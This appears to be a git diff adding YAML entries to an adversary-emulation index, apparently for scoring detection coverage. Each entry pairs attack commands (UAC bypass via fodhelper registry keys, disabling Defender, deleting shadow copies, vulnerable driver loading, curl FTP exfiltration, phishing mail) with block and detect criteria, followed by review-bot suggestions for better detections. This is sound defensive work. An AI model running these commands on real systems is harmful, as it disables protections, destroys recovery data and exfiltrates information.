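Review bot: The guidance clears three logs but the detect item only cites Event ID 1102, which is written to the Security log when the Security log is cleared; clearing the Application or System log is recorded instead as Event ID 104 in the System log (source Eventlog). Change the second detect item to `- Suspicious Windows Event Log clearing is detected in the SIEM using Event ID 1102 (Security log cleared) and Event ID 104 (System/Application log cleared)` so that two of the three guidance steps are not silently undetectable by the index's own criteria. A note that these events must be forwarded to the SIEM before the clear happens (they survive only off-host) would also help scorers.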
@@ -0,0 +1,20 @@
+name: Sideload a DLL into a legitimate application
+description: Rename an attacker-controlled DLL to the name of a DLL expected by a legitimate application, move that DLL to be adjacent to the application, then execute the application in order to trigger the loading of the DLL by the legitimate application.
+platforms:
+- windows
+guidance:
+- "CMD>\ncopy {{ application }} .\nmove {{ dll }} {{ expected_dll }}\n{{ application }}"
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Using image load telemetry, alert on DLLs stored on-disk at unexpected locations (e.g. a DLL expected to be in System32 being loaded from a temp folder)
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 2496e250-5757-482f-9661-daea872395ae
+ tid: T1574.002
+ tactic: TA0005
+ x_vectr_id: 2496e250-5757-482f-9661-daea872395ae
+ isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml b/h-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
new file mode 100644
index 0000000..bc14660
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/327db68c-178b-4e3c-8f2d-12d91bc49fe0.yml
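Review bot: The second detect item keys only on the DLL's on-disk location, but the guidance copies the legitimate application next to the DLL, so in this scenario both files sit in the same attacker-chosen directory and a "DLL outside System32" rule may still fire only by luck of where the test is staged. A location-independent signal worth adding is `- Using image load telemetry (e.g. Sysmon Event ID 7), alert when a signed application loads an unsigned DLL, or a DLL whose signer differs from the application's signer, from the application's own directory`. The guidance line is a double-quoted YAML scalar with embedded `\n`, unlike the other entries which use one list item per command; splitting it into three `- CMD> ...` items would keep the index's own format consistent.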
@@ -0,0 +1,22 @@
+name: Load known-abusable kernel driver
+description: Load a legitimate and signed kernel driver that is vulnerable to exploitation. Refer to projects like KDU (https://github.com/hfiref0x/KDU/) for potential vulnerable drivers to use. Vulnerable, signed drivers provide a privileged (kernel) execution mechanism to attackers, allowing them to bypass security controls they couldn't otherwise bypass, such as by killing protected processes.
+platforms:
+- windows
+guidance:
+- "(example) cmd> \nsc.exe create {{ name }} type= kernel start= demand error= normal binpath= c:\\windows\\System32\\Drivers\\{{ sys_file }} displayname= {{ name }}\nsc.exe start {{ name }}\n"
+block:
+- Use built-in Windows security features like HVCI and WDAC to block loading of drivers based on hash and/or signature characteristics.
+- https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules
+- https://www.loldrivers.io/
+- Anomalous driver load blocked by endpoint security tool
+detect:
+- Anomalous driver load detected by endpoint security tool or in the SIEM via telemetry data, such as Sysmon ID 6
+controls:
+- Hardening
+- Endpoint Protection
+metadata:
+ id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ tid: T1014
+ tactic: TA0005
+ x_vectr_id: 327db68c-178b-4e3c-8f2d-12d91bc49fe0
+ isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml b/h-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
new file mode 100644
index 0000000..77a3868
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/8c06191e-8c03-4b97-8c18-e28cde39fda5.yml
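Review bot: The `detect` list covers the driver load itself (Sysmon ID 6) but not the service installation the guidance performs with `sc.exe create ... type= kernel`, which is a much noisier and more broadly collected signal; add `- New kernel-mode service installation detected in the SIEM via System log Event ID 7045 (or Security log 4697) where the service type is kernel driver`. The `controls` list omits `SIEM` even though the detect item names SIEM telemetry, unlike the sibling entries that list it. The two bare URLs under `block` are references rather than block criteria; moving them to `x_references` under `metadata`, as the fodhelper entry does, would keep the block list scoreable.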
@@ -0,0 +1,25 @@
+name: Bypass User Account Control (UAC) via fodhelper
+description: Bypass user account control (UAC) to move to a high-integrity execution context via fodhelper.exe and a Registry modification
+platforms:
+- windows
+guidance:
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "C:\windows\system32\cmd.exe" /f
+- cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /d "" /f
+- cmd> c:\windows\system32\fodhelper.exe
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Windows Registry access/modifications detected in the SIEM using telemetry (e.g. Windows Advanced Audit events, endpoint security tool logs)
+controls:
+- SIEM
+- Endpoint Protection
+metadata:
+ id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ tid: T1548.002
+ tactic: TA0004
+ x_references:
+ - https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/
+ x_vectr_id: 8c06191e-8c03-4b97-8c18-e28cde39fda5
+ isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml b/h-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
new file mode 100644
index 0000000..9574d4f
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/940be4b6-6081-4808-ab64-aceadfeb3792.yml
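Review bot: The second detect item is generic ("Suspicious Windows Registry access/modifications") although the guidance names the exact key the bypass depends on, so the index gives scorers no way to distinguish a purpose-built rule from broad registry auditing. Suggested wording: `- Creation of or writes to HKCU\Software\Classes\ms-settings\Shell\Open\command (in particular the DelegateExecute value) detected via registry telemetry such as Sysmon Event ID 12/13 or Event ID 4657`. A `Hardening` control and block item for setting UAC to "Always notify" would also be appropriate, since fodhelper-style bypasses rely on the default auto-elevation prompt level; please confirm against the referenced write-up before adding.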
@@ -0,0 +1,20 @@
+name: DLL execution using Rundll32
+description: Execute a malicious DLL's function directly using rundll32
+platforms:
+- windows
+guidance:
+- cmd> rundll32 {{ dll }},{{ export }} [{{ args }}]
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ tid: T1218.011
+ tactic: TA0005
+ x_vectr_id: 940be4b6-6081-4808-ab64-aceadfeb3792
+ isv: 1
diff --git a/h-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml b/h-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
new file mode 100644
index 0000000..66ceb94
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/cb3ea139-979c-438a-9cf7-611b985f4d61.yml
@@ -0,0 +1,20 @@
+name: Disable Windows Defender via PowerShell
+description: Use PowerShell's Set-MpPreference to disable Windows Defender
+platforms:
+- windows
+guidance:
+- PS> Set-MpPreference -DisableBehaviorMonitoring $true
+- PS> Set-MpPreference -DisableRealtimeMonitoring $true
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- "Changes to Defender's running state are detected using Defender Event Log events (e.g. 5001 for being disabled, 5004 and 5007 for being changed; full list: https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus)"
+controls:
+- Endpoint Protection
+metadata:
+ id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ tid: T1562.001
+ tactic: TA0005
+ x_vectr_id: cb3ea139-979c-438a-9cf7-611b985f4d61
+ isv: 1
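Review bot: The Defender entry's `block` list does not mention Tamper Protection, which is the Defender feature designed specifically to reject `Set-MpPreference` changes to real-time and behavior monitoring from an unauthorized context, so organizations that have it enabled receive no credit; add `- Microsoft Defender Tamper Protection is enabled so that Set-MpPreference cannot disable real-time or behavior monitoring` and list `Hardening` in `controls`. The `controls` list also omits `SIEM` although the second detect item depends on collecting Defender operational log events centrally. The `detect` list for the Rundll32 entry above has only the generic sentence while its `controls` credits `SIEM`; a process-creation item naming rundll32 invoking a DLL from a user-writable path would make that control scoreable.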
diff --git a/h-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml b/h-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
new file mode 100644
index 0000000..df9cb79
--- /dev/null
+++ b/h-index-2024/techniques/DefenseEvasion/cbd9070f-03fa-455f-af46-99e8d41146ac.yml
@@ -0,0 +1,16 @@
+name: Modify identity policy in IdP
+description: Modify an IdP policy to be more permissive for authentication. For example, disable an Azure AD conditional access policy's MFA requirement.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Monitor for policy modifications from IdP control plane telemetry and look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+ id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ tid: T1484
+ tactic: TA0003
+ x_vectr_id: cbd9070f-03fa-455f-af46-99e8d41146ac
+ isv: 1
diff --git a/h-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml b/h-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
new file mode 100644
index 0000000..dbf086a
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/3f120c23-78c0-462f-808f-38ef4f607233.yml
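Review bot: `tactic: TA0003` (Persistence) does not match the file's own placement under DefenseEvasion, and as far as I recall ATT&CK maps T1484 to Defense Evasion and Privilege Escalation rather than Persistence — please check the current technique page and align the tactic id with the folder. The `block` list is the `- ''` placeholder, yet IdPs commonly support preventive controls for exactly this scenario; an item such as `- Policy changes require a privileged role protected by phishing-resistant MFA and are gated by approval/change management (e.g. PIM-style just-in-time elevation)` with an `IdP` control would let hardened tenants score. "occuring" in the detect item should be "occurring".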
@@ -0,0 +1,24 @@
+name: Internal network scan using Net Scan
+description: Perform an internal network scan to discover other hosts and services on the internal network using Network Scanner by SoftPerfect
+platforms:
+- windows
+guidance:
+- cmd> {{ netscan_binary }}
+block:
+- Network security controls block source generating a large volume of connection requests
+- Block the installation and use of unapproved third-party utilities via application control software
+detect:
+- Network security controls or the SIEM detect a source generating a large volume of connection requests by network traffic logs like switch logs and flow logs
+controls:
+- ID/PS
+- Firewall
+- SIEM
+- Application Control
+metadata:
+ id: 3f120c23-78c0-462f-808f-38ef4f607233
+ tid: T1046
+ tactic: TA0007
+ x_tools:
+ - https://www.softperfect.com/products/networkscanner/
+ x_vectr_id: 3f120c23-78c0-462f-808f-38ef4f607233
+ isv: 1
diff --git a/h-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml b/h-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
new file mode 100644
index 0000000..751b34b
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/4266c26e-0470-4b97-8dc3-1d24fe35f586.yml
@@ -0,0 +1,20 @@
+name: Domain trust discovery via nltest
+description: Identify domain trust relationships using nltest.exe
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /domain_trusts /all_trusts
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+ tid: T1482
+ tactic: TA0007
+ x_vectr_id: 4266c26e-0470-4b97-8dc3-1d24fe35f586
+ isv: 1
diff --git a/h-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml b/h-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
new file mode 100644
index 0000000..b1e1235
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/672f8861-c914-4f58-b861-5107ce19f61c.yml
@@ -0,0 +1,22 @@
+name: BloodHound DC enumeration
+description: Use BloodHound/SharpHound to perform enumeration of domain resources against a domain controller
+platforms:
+guidance:
+- cmd> SharpHound.exe -c DcOnly
+block:
+- ''
+detect:
+- Windows enumeration activities detected from large amount of network traffic (SMB, ARP, SAMR, etc) via UEBA-like or network monitoring tools
+- Enable object logging for directory services via Group Policy Advanced Audit then configure a SACL on Active Directory objects. Trigger an alert when multiple (high-value) objects are accessed by a single source in a short period using object access logs for the directory service objects (Evevnt ID 4656, 4663)
+- https://blog.blacklanternsecurity.com/p/detecting-ldap-recoannaissance
+controls:
+- SIEM
+- Identity Threat Protection
+metadata:
+ id: 672f8861-c914-4f58-b861-5107ce19f61c
+ tid: T1087.002
+ tactic: TA0007
+ x_tools:
+ - https://github.com/BloodHoundAD/SharpHound
+ x_vectr_id: 672f8861-c914-4f58-b861-5107ce19f61c
+ isv: 1
diff --git a/h-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml b/h-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
new file mode 100644
index 0000000..0502f98
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2.yml
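Review bot: The second detect item cites `Evevnt ID 4656, 4663` for directory service object access, but 4656/4663 are the generic object-access (file/registry/kernel object) events; access to Active Directory objects under a SACL is recorded as Event ID 4662, which is exactly the event the DCSync entry in this same commit uses. Change it to `(Event ID 4662)` so the two entries agree and rule authors are pointed at the right log. The first detect item lists ARP among the protocols, which is link-local and not something a DC-only LDAP/SAMR collection would generate in volume — consider dropping it or hedging. The reference URL ends in `detecting-ldap-recoannaissance`; please confirm it resolves, since the spelling looks like a typo that would leave a dead link.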
@@ -0,0 +1,23 @@
+name: Enumerate domain groups and users using net
+description: Enumerate domain users and domain groups using the builtin net.exe
+platforms:
+- windows
+guidance:
+- cmd> net user /domain
+- cmd> net group /domain
+- cmd> net group "Domain Admins" /domain
+- cmd> net group "Domain Computers" /domain
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ tid: T1087.002
+ tactic: TA0007
+ x_vectr_id: 7e9f21a6-1f5c-4f4a-894e-55ea9daaf0d2
+ isv: 1
diff --git a/h-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml b/h-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
new file mode 100644
index 0000000..e73f4ce
--- /dev/null
+++ b/h-index-2024/techniques/Discovery/bc85f11b-e481-4afb-a5f5-db26e5c07433.yml
@@ -0,0 +1,20 @@
+name: Domain Controller discovery via nltest
+description: Use nltest.exe to identify domain controllers in the domain
+platforms:
+- windows
+guidance:
+- cmd> nltest.exe /dclist:{{ domain }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Use process create events (e.g. Event ID 4688) to identify anomalous process invocation as compared to a baseline of process invocations by user and/or user characteristics (e.g. department). Base comparisons on the process/image name rather than the command line where possible.
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ tid: T1018
+ tactic: TA0007
+ x_vectr_id: bc85f11b-e481-4afb-a5f5-db26e5c07433
+ isv: 1
diff --git a/h-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml b/h-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
new file mode 100644
index 0000000..867c552
--- /dev/null
+++ b/h-index-2024/techniques/Execution/a7134d71-dc49-41a8-a309-ec520c96a089.yml
@@ -0,0 +1,22 @@
+name: Macro - Remote Template
+description: Execute a malicious Office document on the endpoint that will load a macro stored in a remote template document
+platforms:
+- windows
+guidance:
+block:
+- Macro execution is blocked by GPO policy
+- Suspicious process execution/behavior blocked by endpoint security tool
+- Payload on disk deleted/quarantined by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Payload on disk triggers an alert with endpoint security tool
+controls:
+- Endpoint Protection
+- Hardening
+- SIEM
+metadata:
+ id: a7134d71-dc49-41a8-a309-ec520c96a089
+ tid: T1221
+ tactic: TA0005
+ x_vectr_id: a7134d71-dc49-41a8-a309-ec520c96a089
+ isv: 1
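Review bot: The "Macro - Remote Template" entry's `detect` list has nothing about the defining step of the technique, the outbound fetch of the template by the Office process, so an organization with proxy or endpoint network telemetry gets no credit for catching it. Add `- Office application (e.g. WINWORD.EXE) initiating an outbound HTTP(S) connection to an external host detected via endpoint network telemetry (e.g. Sysmon Event ID 3) or web gateway logs` and list `Web Gateway` in `controls`. The entry is filed under Execution but tagged `tactic: TA0005`; if the folder is meant to track the tactic, one of the two should change (the same question applies to "Modify group policy object" under Impact with `TA0005`).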
diff --git a/h-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml b/h-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
new file mode 100644
index 0000000..fff885f
--- /dev/null
+++ b/h-index-2024/techniques/Exfiltration/11b7a86e-4596-4df9-a2a9-705096756d28.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over FTP
+description: Exfiltrate data from the internal network to an external system via FTP
+platforms:
+guidance:
+- https://dlptest.com/ftp-test/
+- shell> curl --ftp-create-dirs -T {{ local_file }} ftp://{{ username }}:{{ password }}@{{ server }}/{{ dest_path }}
+block:
+- Outbound connections over FTP are blocked by network security configurations
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- DLP
+- Firewall
+metadata:
+ id: 11b7a86e-4596-4df9-a2a9-705096756d28
+ tid: T1048.003
+ tactic: TA0010
+ x_vectr_id: 11b7a86e-4596-4df9-a2a9-705096756d28
+ isv: 1
diff --git a/h-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml b/h-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
new file mode 100644
index 0000000..77e983d
--- /dev/null
+++ b/h-index-2024/techniques/Exfiltration/7d63d9d1-0bb4-41b5-9fe2-785bad419860.yml
@@ -0,0 +1,19 @@
+name: Extract sensitive data over HTTP
+description: Extract data from the network over HTTP tcp/80 to an external host or IP.
+platforms:
+guidance:
+- http://dlptest.com/http-post/
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+ id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+ tid: T1048.003
+ tactic: TA0010
+ x_vectr_id: 7d63d9d1-0bb4-41b5-9fe2-785bad419860
+ isv: 1
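Review bot: The FTP entry's `detect` list is DLP-only, although the `block` list and `controls` already recognize that outbound FTP itself is the anomaly on most networks; add `- Outbound connections on tcp/21 (or any cleartext FTP) from internal hosts detected via firewall/flow logs in the SIEM` and list `SIEM` so that the detect side is scoreable without a DLP product. The HTTP entry below it has the same shape: only a DLP item under `detect` while the `controls` list credits a Web Gateway that would see the POST to an uncategorized destination. The FTP guidance embeds `{{ username }}:{{ password }}` in the URL; since test credentials for the dlptest.com service are what is meant, a short note that these are the public test credentials, not organizational ones, would avoid a tester pasting real secrets into a logged command line.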
diff --git a/h-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml b/h-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
new file mode 100644
index 0000000..b807191
--- /dev/null
+++ b/h-index-2024/techniques/Exfiltration/9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66.yml
@@ -0,0 +1,19 @@
+name: Extract data to cloud storage service
+description: Extract data from the internal network to a cloud storage service like MEGA, Google Drive, or Box
+platforms:
+guidance:
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- Network security tool detects connection to domain based on category from proxy or DNS
+detect:
+- Sensitive data sent over the network is detected by network DLP tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+ id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+ tid: T1567.002
+ tactic: TA0010
+ x_vectr_id: 9b1ad734-9b2b-4e12-8a7c-dacd2cddfb66
+ isv: 1
diff --git a/h-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml b/h-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
new file mode 100644
index 0000000..3c2f885
--- /dev/null
+++ b/h-index-2024/techniques/Exfiltration/b48fa856-d004-4d5a-918f-d9429a9cd8e3.yml
@@ -0,0 +1,20 @@
+name: Extract sensitive data over HTTP C2
+description: Extract data from the network via an HTTP C2 channel over tcp/80 to external host or IP
+platforms:
+guidance:
+- implant> download {{ file }}
+block:
+- Sensitive data sent over the network is blocked by network DLP tool
+- C2 channel is blocked by proxy, firewall, or network behavioral/UEBA tool
+detect:
+- C2 channel is detected by proxy, firewall, or network behavioral/UEBA tool
+controls:
+- Firewall
+- DLP
+- Web Gateway
+metadata:
+ id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+ tid: T1567.002
+ tactic: TA0010
+ x_vectr_id: b48fa856-d004-4d5a-918f-d9429a9cd8e3
+ isv: 1
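Review bot: The second `block` item reads `Network security tool detects connection to domain based on category from proxy or DNS`, which describes a detection outcome, not a block; under `block:` it should say `blocks connection to domain based on category from proxy or DNS`, and the detection counterpart (the same sentence with "detects") belongs under `detect:`, which currently has only the DLP item. Moving it gives organizations with category-based proxy alerting a scoreable detect entry, matching how the HTTPS C2 entry pairs its block and detect sentences. Note the HTTP C2 exfiltration entry below uses `tid: T1567.002`, the same sub-technique as this cloud-storage entry; exfiltration over an existing C2 channel is normally mapped to T1041, so one of the two ids looks copied — please verify.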
diff --git a/h-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml b/h-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
new file mode 100644
index 0000000..2dbf5f4
--- /dev/null
+++ b/h-index-2024/techniques/Impact/31d4a02d-4a66-4740-a9c4-8814319fd5c4.yml
@@ -0,0 +1,20 @@
+name: Delete shadows with vssadmin.exe
+description: Delete volume shadow copies on the host to inhibit file system recovery
+platforms:
+- windows
+guidance:
+- CMD> vssadmin.exe delete shadows /all /quiet
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool or triggers alert in SIEM based on telemetry
+- Suspicious Volume Shadow Service use detected in the SIEM using telemetry
+controls:
+- Endpoint Protection
+- SIEM
+metadata:
+ id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+ tid: T1490
+ tactic: TA0040
+ x_vectr_id: 31d4a02d-4a66-4740-a9c4-8814319fd5c4
+ isv: 1
diff --git a/h-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml b/h-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
new file mode 100644
index 0000000..4e63384
--- /dev/null
+++ b/h-index-2024/techniques/Impact/45591791-541b-4a27-bda9-75e6d78a66f4.yml
@@ -0,0 +1,16 @@
+name: Modify group policy object
+description: Modify a domain group policy object. This can be used for activities like persisting access to the environment, disabling security controls, and executing ransomware on domain systems.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Configure auditing on group policy objects then look for anomalous changes, such as those performed by unexpected principals or changes occuring outside of expected business processes
+controls:
+- SIEM
+metadata:
+ id: 45591791-541b-4a27-bda9-75e6d78a66f4
+ tid: T1484.001
+ tactic: TA0005
+ x_vectr_id: 45591791-541b-4a27-bda9-75e6d78a66f4
+ isv: 1
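Review bot: The GPO entry's detect item says "Configure auditing on group policy objects" without naming the telemetry, unlike the DCSync and Kerberoasting entries which cite specific events; for GPO edits the relevant record is Directory Service Changes auditing, Event ID 5136 ("A directory service object was modified") on the groupPolicyContainer object, together with file-share auditing on the SYSVOL policy folder, so `(Event ID 5136 on groupPolicyContainer objects; SYSVOL file modification events)` should be appended. The `block` list is `- ''` although restricting GPO edit rights to a tiered admin group and enabling change control are standard, scoreable mitigations. "occuring" should be "occurring", the same typo as in the IdP policy entry.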
diff --git a/h-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml b/h-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
new file mode 100644
index 0000000..f6c2e88
--- /dev/null
+++ b/h-index-2024/techniques/Impact/72224b97-93d1-4087-8b82-6b4342bf2e09.yml
@@ -0,0 +1,20 @@
+name: Encrypt a large amount of files
+description: Encrypt a large amount of files on the endpoint to simulate ransomware
+platforms:
+guidance:
+- cmd> coldcryptor.exe run {{ extension }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Suspicious process execution/behavior detected by endpoint security tool
+- Detect common ransomware extensions using file system telemetry
+controls:
+- Endpoint Protection
+metadata:
+ id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ tid: T1486
+ tactic: TA0040
+ x_tools:
+ - https://github.com/2XXE-SRA/payload_resources/tree/master/coldencryptor
+ x_vectr_id: 72224b97-93d1-4087-8b82-6b4342bf2e09
+ isv: 1
diff --git a/h-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml b/h-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
new file mode 100644
index 0000000..88fa6ed
--- /dev/null
+++ b/h-index-2024/techniques/InitialAccess/0a348365-1f35-445c-baf0-a6687ddc3f40.yml
@@ -0,0 +1,17 @@
+name: Attachment - Macro
+description: Send a spearphishing attachment containing a malicious macro payload to a target inbox
+platforms:
+guidance:
+- ps> Send-MailMessage -SmtpServer {{ maildomain }} -UseSSL -BodyAsHTML -Subject {{ subject }} -Body {{ body }} -To {{ target }} -From {{ from }} -Attachments {{ attachment }}
+block:
+- Suspicious process execution/behavior blocked by endpoint security tool
+detect:
+- Malicious email alerted on by email gateway
+controls:
+- Mail Gateway
+metadata:
+ id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+ tid: T1566.001
+ tactic: TA0001
+ x_vectr_id: 0a348365-1f35-445c-baf0-a6687ddc3f40
+ isv: 1
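Review bot: The guidance runs `coldcryptor.exe` while the `x_tools` link points at a `coldencryptor` directory, so one of the two names is probably a typo and a tester following the link may not find a binary of the name the guidance gives — please reconcile them. The second detect item mentions file system telemetry yet `controls` lists only `Endpoint Protection`, not `SIEM`, unlike the vssadmin entry in the same folder; and `platforms:` is empty although the guidance is a Windows `cmd>` invocation. A second detect item worth adding is the volumetric one the technique name implies: `- High rate of file rename/write operations by a single process detected via file system telemetry or honeyfile/canary file modification alerts`.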
diff --git a/h-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml b/h-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
new file mode 100644
index 0000000..b95efea
--- /dev/null
+++ b/h-index-2024/techniques/InitialAccess/1f9d5363-ddf4-41c3-8bc3-f80595219206.yml
@@ -0,0 +1,16 @@
+name: Suspicious service use
+description: Interact with a service from an unexpected geolocation and with an unexpected user-agent to simulate suspicious use of the target service. This can occur, for example, when a user's token is stolen via a phishing attack then used by an attacker to assume their session and access a service.
+platforms:
+guidance:
+block:
+- ''
+detect:
+- Baseline application use for users using application logs then generate alerts for instances where the usage occurs from comparatively anomalous geolocations
+controls:
+- SIEM
+metadata:
+ id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+ tid: T1078
+ tactic: TA0001
+ x_vectr_id: 1f9d5363-ddf4-41c3-8bc3-f80595219206
+ isv: 1
diff --git a/h-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml b/h-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
new file mode 100644
index 0000000..7e31368
--- /dev/null
+++ b/h-index-2024/techniques/InitialAccess/609515fe-24e0-4bc2-a069-a3d815e68ec2.yml
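Review bot: The description says the test uses both an unexpected geolocation and an unexpected user-agent, but the single detect item baselines only geolocation, so a defender whose rule keys on user-agent or device fingerprint change (the more robust signal when the attacker proxies through the victim's region) cannot score this entry. Extend it to `- ... where the usage occurs from comparatively anomalous geolocations, user-agents/device fingerprints, or an impossible-travel distance from the user's prior session`. The `block` list is `- ''` even though the scenario described (a stolen session token reused from elsewhere) is exactly what token binding/continuous access evaluation and device-compliance conditional access policies prevent; an `IdP` block item would be appropriate. The same geolocation-only gap is in the "Suspicious external employee login" entry that follows.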
